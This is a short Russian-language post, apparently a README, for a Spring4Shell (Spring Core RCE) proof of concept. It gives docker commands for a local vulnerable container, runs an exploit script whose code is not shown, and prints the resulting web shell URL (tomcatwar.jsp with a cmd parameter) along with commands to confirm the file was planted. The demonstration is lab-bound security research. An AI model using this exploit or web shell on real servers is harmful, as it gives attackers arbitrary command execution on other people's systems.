
Ещё один POC для spring4shell (Spring core RCE)
Эта уязвимость затрагивает Spring Core и позволяет злоумышленнику отправлять специально сформированный HTTP-запрос для обхода защитных механизмов парсера HTTP-запросов библиотеки, что приводит к удаленному выполнению кода.
Подробнее здесь

Для эксплуатации этой уязвимости должны выполняться несколько условий:
docker build . -t springshell-rce-poc
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
python exploit-poc.py --url "http://127.0.0.1:8081/"
Ожидаемый ответ
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami
Если вы перейдете по этому URL, он выполнит любую нужную вам команду cmd=<whatyouwant>

Если вы подключитесь по SSH к контейнеру, вы увидите, что был создан новый файл tomcatwar.jsp
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT